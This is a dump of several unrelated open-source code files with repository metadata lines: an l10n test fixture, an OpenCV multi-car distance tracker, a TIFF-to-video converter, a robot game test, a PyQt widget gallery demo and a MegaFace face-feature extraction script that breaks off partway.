# Test lazy strings are extracted
_lazy('a lazy string')
"""
TEST_PO_OUTPUT = """\
#: filename:3
msgid "fligtar"
msgstr ""
#: filename:4
msgctxt "atwork"
msgid "fligtar"
msgstr ""
#: filename:5
msgctxt "athome"
msgid "fligtar"
msgstr ""
#: filename:8
msgid "a fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#: filename:11
#: filename:12
#: filename:13
msgctxt "aticecreamshop"
msgid "a fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#. l10n: Turn down the volume
#: filename:23
msgctxt "aticecreamshop"
msgid "fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#: filename:26
msgid "a lazy string"
msgstr ""
"""
TEST_TEMPLATE_INPUT = """
{{ _('sunshine') }}
{{ _('sunshine', 'nothere') }}
{{ _('sunshine', 'outside') }}
{# Regular comment, regular gettext #}
{% trans %}
I like pie.
{% endtrans %}
{# l10N: How many hours? #}
{% trans plural=4, count=4 %}
{{ count }} hour left
{% pluralize %}
{{ count }} hours left
{% endtrans %}
{{ ngettext("one", "many", 5) }}
{# L10n: This string has a hat. #}
{% trans %}
Let me tell you about a string
who spanned
multiple lines.
{% endtrans %}
"""
TEST_TEMPLATE_OUTPUT = """\
#: filename:2
msgid "sunshine"
msgstr ""
#: filename:3
msgctxt "nothere"
msgid "sunshine"
msgstr ""
#: filename:4
msgctxt "outside"
msgid "sunshine"
msgstr ""
#: filename:7
msgid "I like pie."
msgstr ""
#. How many hours?
#: filename:12
msgid "%(count)s hour left"
msgid_plural "%(count)s hours left"
msgstr[0] ""
msgstr[1] ""
#: filename:18
msgid "one"
msgid_plural "many"
msgstr[0] ""
msgstr[1] ""
#. This string has a hat.
#: filename:21
msgid "Let me tell you about a string who spanned multiple lines."
msgstr ""
"""
| clouserw/tower | tower/tests/test_l10n.py | test_l10n.py | py | 11,819 | python | en | code | 34 | github-code | 13 |
44889001224 | import cv2 as cv
import csv
import math
import numpy as np
import scipy.signal
from matplotlib import pyplot as plt
import argparse
from Tracker import Tracker
agentLength = 10.5 # cm (cube)
def readTrack(opt):
# read CSV file
N = opt.nCars # number of cars
positions = [] # for perspective transform
with open(opt.cornerPoints, "r") as infile:
reader = csv.reader(infile)
for row in reader:
row_float =[float(row[0]), float(row[1])]
positions.append(row_float)
# Read video
vid = cv.VideoCapture(opt.fileName)
if not vid.isOpened():
exit(-1)
fps = vid.get(cv.CAP_PROP_FPS)
deltaT = 1./fps
ret, frame = vid.read()
height, width = frame.shape[:2] # height and width in pixels
# write CSV file
myFile = open(opt.outputName, 'w', newline = '')
writer = csv.writer(myFile)
firstrow = ['time(s)']
for i in range(N-1):
firstrow.append('distance' + str(i+1) + str(i+2) + '(cm)')
writer.writerow(firstrow)
del(firstrow) # free memory
# Perspective transform
src = np.float32([positions[0], positions[1], positions[2], positions[3]])
dst = np.float32([positions[0], [positions[0][0], positions[1][1]], [positions[2][0], positions[0][1]], [positions[2][0], positions[1][1]]])
M = cv.getPerspectiveTransform(src, dst) # Transformation matrix
warped_frame = cv.warpPerspective(frame, M, (width, height))
frame = cv.warpPerspective(frame, M, (width, height))
# get agent length in pixels
cv.namedWindow('Pixels to centimetres', cv.WINDOW_NORMAL)
bbox = cv.selectROI('Pixels to centimetres', warped_frame, False)
length = bbox[2] # pixel
cv.destroyWindow('Pixels to centimetres')
# read CSV file
trackPoints = []
with open(opt.trackName, "r") as infile:
reader = csv.reader(infile)
for row in reader:
row_float =[float(row[0]), float(row[1])]
trackPoints.append(row_float)
# trackPoints_x = [x[0] for x in trackPoints]
# trackPoints_y = [y[1] for y in trackPoints]
trackPoints_x_cm = [x[0] * agentLength / length for x in trackPoints]
trackPoints_y_cm = [y[1] * agentLength / length for y in trackPoints]
plt.figure(0)
plt.cla()
plt.figure(0).patch.set_facecolor('#000000')
plt.gca().tick_params(axis='x', colors='#ffffff')
plt.gca().tick_params(axis='y', colors='#ffffff')
plt.gca().yaxis.label.set_color('#ffffff')
plt.gca().xaxis.label.set_color('#ffffff')
plt.gca().set_aspect('equal')
plt.gca().set_ylim(0, height * agentLength / length)
plt.gca().set_xlim(0, width * agentLength / length)
plt.gca().imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB), extent=[0, width * agentLength / length, 0, height * agentLength / length])
plt.plot(trackPoints_x_cm, trackPoints_y_cm, color='lime')
plt.xlabel('(cm)')
plt.ylabel('(cm)')
plt.figure(0).tight_layout()
plt.show()
# initialise trackers
cv.namedWindow('zTracking', cv.WINDOW_AUTOSIZE)
trackers = []
for i in range(N):
trackers.append(Tracker(frame))
cv.destroyWindow('zTracking')
firstFrame = True
seconds = 0.
timeArr = []
distancesArr = []
colours_plot = ['lime', 'magenta', 'yellow', 'cyan', 'green', 'blue', 'red']
count_frame = 0
while vid.isOpened():
ret, frame = vid.read()
if ret:
points = []
frame = cv.warpPerspective(frame, M, (width, height))
for tracker in trackers:
if(tracker.update(frame)):
tracker.getCoordinates()
else:
print('could not detect object')
exit(-1)
tracker.getCentroid(height)
points.append(tracker.p)
# Find closest point in track
pointsInTrack = []
pointsInTrackPositions = []
for point in points:
minDistance = 10000.
count = 0
for trackPoint in trackPoints:
euclideanDistance2 = (point[0] - trackPoint[0]) ** 2 + (point[1] - trackPoint[1]) ** 2
if euclideanDistance2 < minDistance:
minDistance = euclideanDistance2
minPoint = trackPoint
positionInTrack = count
count += 1
pointsInTrack.append(minPoint)
pointsInTrackPositions.append(positionInTrack)
# Find non-euclidean distance
distances = []
distances_cm = []
temp_distance = 0.0
for i in range(N - 1):
if pointsInTrackPositions[i] <= pointsInTrackPositions[i+1]:
for k in range(pointsInTrackPositions[i], pointsInTrackPositions[i+1] - 1):
temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
else:
for k in range(0, pointsInTrackPositions[i+1]):
temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
for k in range(pointsInTrackPositions[i], len(trackPoints) - 1):
temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
# Add discontinuity
temp_distance += math.sqrt((trackPoints[0][0] - trackPoints[len(trackPoints) - 1][0]) ** 2 + (trackPoints[0][1] - trackPoints[len(trackPoints) - 1][1]) ** 2)
distances.append(temp_distance)
distances_cm.append(temp_distance * agentLength / length)
# Clean temporal variable before next iteration
temp_distance = 0.0
# Plot animation
plt.figure(1)
plt.cla()
plt.gca().set_aspect('equal')
plt.xlabel('(cm)')
plt.ylabel('(cm)')
plt.gca().set_ylim(0, height * agentLength / length)
plt.gca().set_xlim(0, width * agentLength / length)
plt.figure(1).tight_layout()
plt.figure(1).patch.set_facecolor('#000000')
plt.gca().tick_params(axis='x', colors='#ffffff')
plt.gca().tick_params(axis='y', colors='#ffffff')
plt.gca().yaxis.label.set_color('#ffffff')
plt.gca().xaxis.label.set_color('#ffffff')
plt.gca().imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB), extent=[0, width * agentLength / length, 0, height * agentLength / length])
# FOR distances
for i in range(N-1):
if pointsInTrackPositions[i] <= pointsInTrackPositions[i+1]:
plt.plot(trackPoints_x_cm[pointsInTrackPositions[i]:pointsInTrackPositions[i+1]], trackPoints_y_cm[pointsInTrackPositions[i]:pointsInTrackPositions[i+1]], color=colours_plot[i])
else:
plt.plot(trackPoints_x_cm[0:pointsInTrackPositions[i+1]], trackPoints_y_cm[0:pointsInTrackPositions[i+1]], color=colours_plot[i])
plt.plot(trackPoints_x_cm[pointsInTrackPositions[i]:-1], trackPoints_y_cm[pointsInTrackPositions[i]:-1], color=colours_plot[i])
# Add discontinuity
plt.plot([trackPoints_x_cm[-1], trackPoints_x_cm[0]], [trackPoints_y_cm[-1], trackPoints_y_cm[0]], color=colours_plot[i])
# plot text
plt.text((points[i][0] + points[i+1][0])/2. * agentLength / length, (points[i][1] + points[i+1][1])/2. * agentLength / length, str(round(distances_cm[i], 1)), color='white')
# FOR points
for i in range(N):
plt.plot(pointsInTrack[i][0] * agentLength / length, pointsInTrack[i][1] * agentLength / length, 'bo', color='red')
plt.pause(0.000000001)
# append into arrays
timeArr = np.append(timeArr, seconds)
distancesArr.append(distances_cm)
# write CSV file
firstrow = [seconds]
for i in range(N-1):
firstrow.append(distances_cm[i])
writer.writerow(firstrow)
del(firstrow) # free memory
seconds += deltaT
if (opt.writeVideo):
plt.savefig('frames/'+"{:05n}".format(count_frame)+'.png')
count_frame += 1
if cv.waitKey(1) == 27:
break
else:
break
vid.release()
plt.show()
# Butterworth filter
b, a = scipy.signal.butter(1, 0.5)
distancesArr = np.array(distancesArr)
for i in range(N-1):
distancesArr[:,i] = scipy.signal.filtfilt(b, a, distancesArr[:,i])
# Plot
plt.figure(2)
for i in range(N-1):
plt.plot(timeArr, distancesArr[:,i], label='distance {}-{} cm'.format(i+1, i+2))
plt.xlabel('Time(s)')
plt.ylabel('Distance(cm)')
plt.title('Distance vs Time')
plt.grid(True)
plt.legend()
plt.show()
def parse_opt(known=False):
parser = argparse.ArgumentParser()
parser.add_argument('--fileName', default = "prueba_1.mp4",type=str,help='Video containing the experiment')
parser.add_argument('--trackName', default = "trackPoints.csv",type=str,help='CSV file containing track coordinates')
parser.add_argument('--outputName', default = "results.csv",type=str,help='Results for plotting')
parser.add_argument('--cornerPoints', default = "cornerPoints.csv",type=str,help='Track corners used for perspective transform')
parser.add_argument('--nCars', default = 5, type=int, help='Number of cars')
parser.add_argument('--writeVideo', action='store_true', help='Flag for frame saving')
opt = parser.parse_known_args()[0] if known else parser.parse_args()
return opt
def main(opt):
readTrack(opt)
if __name__ == '__main__':
opt = parse_opt()
main(opt)
| Zimrahin/zTracking | readTrack.py | readTrack.py | py | 8,656 | python | en | code | 3 | github-code | 13 |
35784868388 | from PIL import Image
import numpy as np
import os
import imageio
import cv2
import sys
sys.path.insert(0, r"add/sensors/folder/to/path")
from config import *
def tiff_to_avi(input_filepath):
path = os.path.dirname(input_filepath)
filename_ext = os.path.basename(input_filepath)
filename = os.path.splitext(filename_ext)[0]
sensor_type = filename[:2]
if(sensor_type == "rgb"):
sensor_type = "rgb"
elif(sensor_type == "rgbd"):
sensor_type = "rgbd"
else:
pass
width = config.getint(sensor_type, "width")
height = config.getint(sensor_type, "height")
fps = config.getint("mmhealth", "fps")
imarray = imageio.volread(input_filepath)
mask = np.ma.masked_invalid(imarray)
imarray[mask.mask] = 0.0
imarray = cv2.normalize(src=imarray, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
imarray[mask.mask] = 255.0
NUM_FRAMES = imarray.shape[0]
if(NUM_FRAMES == 1):
frame = imarray[0]
output_filepath = os.path.join(path, filename + ".jpeg")
imageio.imwrite(output_filepath, frame.astype(np.uint8))
else:
output_filepath = os.path.join(path, filename + "_avi.avi")
imageio.mimwrite(output_filepath, imarray.astype(np.uint8), fps = fps)
print("Tiff to Avi Conversion: Sensor {} done! Shape: {}".format(sensor_type, imarray.shape) )
cv2.destroyAllWindows()
if __name__ == "__main__":
input_filepath = r"path/to/tiff/file"
tiff_to_avi(input_filepath) | UCLA-VMG/EquiPleth | data_acquisition/postproc/tiff_to_avi.py | tiff_to_avi.py | py | 1,516 | python | en | code | 6 | github-code | 13 |
9543178637 | import gym
from stable_baselines3 import PPO
# Model path
model_dir = ""
model_path = ""
# Load in model
model = PPO.load(model_path)
# Forms environment
env = None
env.reset()
# Run model for show
done = False
while done:
obs = env.reset()
done = False
while not done:
env.render()
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action) | akingsley319/AI_Plays_DarkSouls | src/EldenRing/ai_plays/engine.py | engine.py | py | 403 | python | en | code | 1 | github-code | 13 |
72753723538 | from mock import patch
from unittest import TestCase
from robotarena.robot import RobotRandom
class TestRobotRandom(TestCase):
def __randint_side_effect(self, lower_bound, upper_bound):
if lower_bound == 0 and upper_bound == 2:
return 1 # always return "push"
elif lower_bound == 0 and upper_bound == 3:
return 2 # always return "S"
else:
return -1
def test_reaction_should_return_empty_action(self):
name = "any_name"
robot = RobotRandom(name)
field = None # any value should do
robot_location = None # any value should do
enemy_location = None # any value should do
with patch('robotarena.robot.robot_random.randint', self.__randint_side_effect):
reaction = robot.reaction(field, robot_location, enemy_location)
self.assertEqual("push", reaction.action_type)
self.assertEqual("S", reaction.direction)
| LIQRGV/robot-arena | test/robot/test_robot_random.py | test_robot_random.py | py | 958 | python | en | code | 0 | github-code | 13 |
30816467974 | """
Slightly modified version of WidgetGallery to remove
any dynamic changes of the style. All the style elements
are defined by qtmodern in the main.py file.
"""
from PyQt5.QtWidgets import QApplication, QCheckBox, QComboBox , QDateTimeEdit, QDial, QGridLayout, \
QGroupBox, QDialog, QLabel, QLineEdit, QProgressBar, QPushButton, QRadioButton, QSlider, \
QScrollBar, QSpinBox, QStyle, QStyleFactory, QTableWidget, \
QTextEdit, QVBoxLayout, QHBoxLayout, QSizePolicy, QTabWidget, QWidget
from PyQt5.QtCore import Qt, QEvent, QDateTime, QTimer, QT_VERSION_STR
from PyQt5.QtGui import QPalette
class WidgetGallery(QDialog):
def __init__(self, parent=None):
super().__init__(parent)
self.styleComboBox = QComboBox()
defaultStyleName = QApplication.style().objectName()
styleNames = QStyleFactory.keys()
styleNames.append("NorwegianWood")
for i in range(1, len(styleNames)):
if (defaultStyleName == styleNames[i]):
styleNames.swapItemsAt(0, i)
break
self.styleComboBox.addItems(styleNames)
styleLabel = QLabel(self.tr("&Style (turned off!):")) # check this tr use
styleLabel.setBuddy(self.styleComboBox)
self.useStylePaletteCheckBox = QCheckBox(self.tr("&Use style's standard palette"))
self.useStylePaletteCheckBox.setChecked(True)
self.disableWidgetsCheckBox = QCheckBox(self.tr("&Disable widgets"))
self.createTopLeftGroupBox()
self.createTopRightGroupBox()
self.createBottomLeftTabWidget()
self.createBottomRightGroupBox()
self.createProgressBar()
if (QT_VERSION_STR == '5.15.4'):
self.styleComboBox.textActivated.connect(self.changeStyle)
else: #support pyqt 5.12
self.styleComboBox.activated[str].connect(self.changeStyle)
self.useStylePaletteCheckBox.toggled.connect(self.changePalette)
self.disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)
self.disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)
self.disableWidgetsCheckBox.toggled.connect(self.bottomLeftTabWidget.setDisabled)
self.disableWidgetsCheckBox.toggled.connect(self.bottomRightGroupBox.setDisabled)
topLayout = QHBoxLayout()
topLayout.addWidget(styleLabel)
topLayout.addWidget(self.styleComboBox)
topLayout.addStretch(1)
topLayout.addWidget(self.useStylePaletteCheckBox)
topLayout.addWidget(self.disableWidgetsCheckBox)
mainLayout = QGridLayout()
mainLayout.addLayout(topLayout, 0, 0, 1, 2)
mainLayout.addWidget(self.topLeftGroupBox, 1, 0)
mainLayout.addWidget(self.topRightGroupBox, 1, 1)
mainLayout.addWidget(self.bottomLeftTabWidget, 2, 0)
mainLayout.addWidget(self.bottomRightGroupBox, 2, 1)
mainLayout.addWidget(self.progressBar, 3, 0, 1, 2)
mainLayout.setRowStretch(1, 1)
mainLayout.setRowStretch(2, 1)
mainLayout.setColumnStretch(0, 1)
mainLayout.setColumnStretch(1, 1)
self.setLayout(mainLayout)
self.setWindowTitle(self.tr("Styles"))
self.styleChanged()
def changeStyle(self, styleName):
pass
def changePalette(self):
pass
def changeEvent(self, event):
if event.type() == QEvent.StyleChange:
self.styleChanged()
def styleChanged(self):
styleName = QApplication.style().objectName()
for i in range(0, self.styleComboBox.count()):
if (self.styleComboBox.itemText(i) == styleName):
self.styleComboBox.setCurrentIndex(i)
break
self.changePalette()
def advanceProgressBar(self):
curVal = self.progressBar.value()
maxVal = self.progressBar.maximum()
self.progressBar.setValue(curVal + (maxVal - curVal) / 100)
def createTopLeftGroupBox(self):
self.topLeftGroupBox = QGroupBox(self.tr("Group 1"))
radioButton1 = QRadioButton(self.tr("Radio button 1"))
radioButton2 = QRadioButton(self.tr("Radio button 2"))
radioButton3 = QRadioButton(self.tr("Radio button 3"))
radioButton1.setChecked(True)
checkBox = QCheckBox(self.tr("Tri-state check box"))
checkBox.setTristate(True)
checkBox.setCheckState(Qt.PartiallyChecked)
layout = QVBoxLayout()
layout.addWidget(radioButton1)
layout.addWidget(radioButton2)
layout.addWidget(radioButton3)
layout.addWidget(checkBox)
layout.addStretch(1)
self.topLeftGroupBox.setLayout(layout)
def createTopRightGroupBox(self):
self.topRightGroupBox = QGroupBox(self.tr("Group 2"))
defaultPushButton = QPushButton(self.tr("Default Push Button"))
defaultPushButton.setDefault(True)
togglePushButton = QPushButton(self.tr("Toggle Push Button"))
togglePushButton.setCheckable(True)
togglePushButton.setChecked(True)
flatPushButton = QPushButton(self.tr("Flat Push Button"))
flatPushButton.setFlat(True)
layout = QVBoxLayout()
layout.addWidget(defaultPushButton)
layout.addWidget(togglePushButton)
layout.addWidget(flatPushButton)
layout.addStretch(1)
self.topRightGroupBox.setLayout(layout)
def createBottomLeftTabWidget(self):
self.bottomLeftTabWidget = QTabWidget()
self.bottomLeftTabWidget.setSizePolicy(QSizePolicy.Preferred,
QSizePolicy.Ignored)
tab1 = QWidget()
tableWidget = QTableWidget(10, 10)
tab1hbox = QHBoxLayout()
tab1hbox.setContentsMargins(5,5, 5, 5)
tab1hbox.addWidget(tableWidget)
tab1.setLayout(tab1hbox)
tab2 = QWidget()
textEdit = QTextEdit()
textEdit.setPlainText("Twinkle, twinkle, little star,\n"
"How I wonder what you are.\n"
"Up above the world so high,\n"
"Like a diamond in the sky.\n"
"Twinkle, twinkle, little star,\n"
"How I wonder what you are!\n")
tab2hbox = QHBoxLayout()
tab2hbox.setContentsMargins(5, 5, 5, 5)
tab2hbox.addWidget(textEdit)
tab2.setLayout(tab2hbox)
self.bottomLeftTabWidget.addTab(tab1, self.tr("&Table"))
self.bottomLeftTabWidget.addTab(tab2, self.tr("Text &Edit"))
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox(self.tr("Group 3"))
self.bottomRightGroupBox.setCheckable(True)
self.bottomRightGroupBox.setChecked(True)
lineEdit = QLineEdit("s3cRe7")
lineEdit.setEchoMode(QLineEdit.Password)
spinBox = QSpinBox(self.bottomRightGroupBox)
spinBox.setValue(50)
dateTimeEdit = QDateTimeEdit(self.bottomRightGroupBox)
dateTimeEdit.setDateTime(QDateTime.currentDateTime())
slider = QSlider(Qt.Horizontal, self.bottomRightGroupBox)
slider.setValue(40)
scrollBar = QScrollBar(Qt.Horizontal, self.bottomRightGroupBox)
scrollBar.setValue(60)
dial = QDial(self.bottomRightGroupBox)
dial.setValue(30)
dial.setNotchesVisible(True)
layout = QGridLayout()
layout.addWidget(lineEdit, 0, 0, 1, 2)
layout.addWidget(spinBox, 1, 0, 1, 2)
layout.addWidget(dateTimeEdit, 2, 0, 1, 2)
layout.addWidget(slider, 3, 0)
layout.addWidget(scrollBar, 4, 0)
layout.addWidget(dial, 3, 1, 2, 1)
layout.setRowStretch(5, 1)
self.bottomRightGroupBox.setLayout(layout)
def createProgressBar(self):
self.progressBar = QProgressBar()
self.progressBar.setRange(0, 10000)
self.progressBar.setValue(0)
timer = QTimer(self)
timer.timeout.connect(self.advanceProgressBar)
timer.start(1000)
| me701/norwegianwood | demo_qtmodern/widgetgallery.py | widgetgallery.py | py | 8,059 | python | en | code | 0 | github-code | 13 |
23607494022 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import os.path
import struct
import sys
import numpy as np
import cv2
# from easydict import EasyDict as edict
import torch
import sklearn
from sklearn import preprocessing
from sklearn.decomposition import PCA
# from models import MobileFaceNet
# sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
# import face_preprocess
# import facenet
# import lfw
# from caffe.proto import caffe_pb2
import torch.backends.cudnn as cudnn
from torchvision import transforms
import pickle
from insightface_v2.model.models import MobileFaceNet, resnet34
from insightface_v2.model.mobilefacenetv2.mobilefacenetv2_v3_width import Mobilefacenetv2_v3_width
from insightface_v2.model.mobilefacenet_pruned import pruned_Mobilefacenet
from insightface_v2.model.mobilefacenetv2_width_wm import Mobilefacenetv2_width_wm
from insightface_v2.model.insightface_resnet import LResNet34E_IR
from insightface_v2.model.insightface_resnet_pruned import pruned_LResNet34E_IR
def de_preprocess(tensor):
return tensor * 0.501960784 + 0.5
hflip = transforms.Compose([
de_preprocess,
transforms.ToPILImage(),
transforms.functional.hflip,
transforms.ToTensor(),
transforms.Normalize([0.5, 0.5, 0.5], [0.501960784, 0.501960784, 0.501960784])
])
def hflip_batch(imgs_tensor):
hfliped_imgs = torch.empty_like(imgs_tensor)
for i, img_ten in enumerate(imgs_tensor):
hfliped_imgs[i] = hflip(img_ten)
return hfliped_imgs
def write_bin(path, feature):
feature = list(feature)
with open(path, 'wb') as f:
f.write(struct.pack('4i', len(feature), 1, 4, 5))
f.write(struct.pack("%df" % len(feature), *feature))
def parse_lst_line(line):
vec = line.strip().split("\t")
assert len(vec) >= 3
aligned = int(vec[0]) # is or not aligned
image_path = vec[1] # aligned image path
label = int(vec[2]) # new define image label(preson+ID-->ID) in align_facescrub.py
bbox = None
landmark = None
# print(vec)
if len(vec) > 3:
bbox = np.zeros((4,), dtype=np.int32)
for i in range(3, 7):
bbox[i - 3] = int(vec[i])
landmark = None
if len(vec) > 7:
_l = []
for i in range(7, 17):
_l.append(float(vec[i]))
landmark = np.array(_l).reshape((2, 5)).T
# print(aligned)
return image_path, label, bbox, landmark, aligned
def read_image(img_path):
img = cv2.imread(img_path, cv2.IMREAD_COLOR)
# print(type(img))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
def get_feature(image_path, model, image_shape, use_flip=True):
img = read_image(image_path)
# print(img.shape)
if img is None:
print('parse image', image_path, 'error')
return None
assert img.shape == (image_shape[1], image_shape[2], image_shape[0])
v_mean = np.array([127.5, 127.5, 127.5], dtype=np.float32).reshape((1, 1, 3))
img = img.astype(np.float32) - v_mean
img *= 0.0078125
img = np.transpose(img, (2, 0, 1))
img = torch.tensor(img.reshape(1, img.shape[0], img.shape[1], img.shape[2]))
# print('图片大小:', img.size())
F = model(img.cuda())
print('use_flip={}'.format(use_flip))
if use_flip:
fliped_img = hflip_batch(img)
fliped_F = model(fliped_img.cuda())
F = F + fliped_F
F = F.data.cpu().numpy().flatten()
_norm = np.linalg.norm(F)
F /= _norm
# print(F.shape)
return F
def get_image_path(image_path, dataser_path, split_str):
_, path = image_path.split(split_str)
return os.path.join(dataser_path, path)
def get_batch_feature(img_path_list, model, image_shape, use_flip=True):
batch_img = np.zeros([len(img_path_list), image_shape[0], image_shape[1], image_shape[2]])
# print("batch_img shape={}".format(batch_img.shape))
for i in range(len(img_path_list)):
img = read_image(img_path_list[i])
# print(img.shape)
if img is None:
print('parse image', img_path_list[i], 'error')
return None
assert img.shape == (image_shape[1], image_shape[2], image_shape[0])
v_mean = np.array([127.5, 127.5, 127.5], dtype=np.float32).reshape((1, 1, 3))
img = img.astype(np.float32) - v_mean
img *= 0.0078125
img = np.transpose(img, (2, 0, 1))
batch_img[i, ...] = img
batch_img = torch.tensor(batch_img).float()
F = model(batch_img.cuda())
print('use_flip={}'.format(use_flip))
if use_flip:
fliped_batch_img = hflip_batch(batch_img)
fliped_F = model(fliped_batch_img.cuda())
F = F + fliped_F
F = F.data.cpu().numpy()
F = sklearn.preprocessing.normalize(F)
# print(F.shape)
return F
def process_batch_feature(args, image_path_list, megaface_out, dataset_path, model, image_shape, use_flip):
img_path_list = []
out_dir_list = []
b_list = []
count = 0
for i in range(len(image_path_list)):
_path = image_path_list[i].split('/')
a1, a2, b = _path[-3], _path[-2], _path[-1]
out_dir = os.path.join(megaface_out, a1, a2)
out_dir_list.append(out_dir)
b_list.append(b)
image_path = get_image_path(image_path_list[i], dataset_path, "MegaFace/")
img_path_list.append(image_path)
feature = get_batch_feature(img_path_list, model, image_shape, use_flip)
# print("img_path_list len={}, out_dir_list len={}, b_list len={}".format(len(img_path_list), len(out_dir_list), len(b_list)))
for i in range(len(img_path_list)):
# print("i={}, {}".format(i, img_path_list[i]))
if not os.path.exists(out_dir_list[i]):
os.makedirs(out_dir_list[i])
out_path = os.path.join(out_dir_list[i], b_list[i] + "_%s_%dx%d.bin" % (args.algo, image_shape[1], image_shape[2]))
# print(out_path)
write_bin(out_path, feature[i].flatten())
count += 1
return count
def main(args):
print(args)
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
cudnn.benchmark = True
image_shape = [int(x) for x in args.image_size.split(',')]
# 186
megaface_lst = "/home/dataset/xz_datasets/Megaface/Mageface_aligned/megaface_112x112/lst"
facescrub_lst = "/home/dataset/xz_datasets/Megaface/Mageface_aligned/Challenge1/facescrub_112x112_v2/small_lst"
dataset_path = "/home/dataset/xz_datasets/Megaface/Mageface_aligned"
# ms1mv2: old_mobilefacenet_baseline_flip
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_v1_model/' \
# 'pytorch_mobilefacenet_epoch34_feature-result_fliped/fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_mobilefacenet_v1_model/' \
# 'pytorch_mobilefacenet_epoch34_feature-result_fliped/fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/'
# 'pytorch_mobilefacenet_v1_model/checkpoint_34.pth')
# ms1mv2: old_mobilefacenet_p0.25_flip
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_pruned0.25_mobilefacenet_v1_better/' \
# 'p0.25_mobilefacenet_v1_lr0.01_checkpoint22_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_pruned0.25_mobilefacenet_v1_better/' \
# 'p0.25_mobilefacenet_v1_lr0.01_checkpoint22_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/'
# 'pytorch_pruned0.25_mobilefacenet_v1_better/'
# 'p0.25_mobilefacenet_v1_without_fc_checkpoint_022.pth')
# # ms1mv2: old_mobilefacenet_p0.5_flip
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_pruned0.5_mobilefacenet_v1/' \
# 'p0.5_mobilefacenet_v1_lr0.01_checkpoint25_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/pytorch_pruned0.5_mobilefacenet_v1/' \
# 'p0.5_mobilefacenet_v1_lr0.01_checkpoint25_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_mobilefacenet/'
# 'pytorch_pruned0.5_mobilefacenet_v1/checkpoint_025.pth')
# ms1mv2: old_r34_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/pytorch_resnet34_epoch48_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/pytorch_resnet34_epoch48_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/xiezheng/programs2019/insightface_DCP/insightface_v2/log/'
# 'insightface_r34/insightface_r34_with_arcface_v2_epoch48.pth')
# ms1mv2: old_r34_p0.3_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.3_r34_lr0.01_checkpoint25_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.3_r34_lr0.01_checkpoint25_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/'
# 'pytorch_pruned0.3_r34_lr0.01_checkpoint25_feature-result/checkpoint_025.pth')
#
# # # ms1mv2: old_r34_p0.5_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.5_r34_lr0.01_checkpoint27_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.5_r34_lr0.01_checkpoint27_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
# check_point_params = torch.load('/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/'
# 'pytorch_pruned0.5_r34_lr0.01_checkpoint27_feature-result/checkpoint_027.pth')
# ms1mv2: old_r34_p0.25_fliped
# megaface_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.25_r34_lr0.01_checkpoint26_feature-result_fliped/' \
# 'fp_megaface_112x112_norm_features'
# facescrub_out = '/home/dataset/xz_datasets/Megaface/ms1mv2_pytorch_r34/' \
# 'pytorch_pruned0.25_r34_lr0.01_checkpoint26_feature-result_fliped/' \
# 'fp_facescrub_112x112_norm_features'
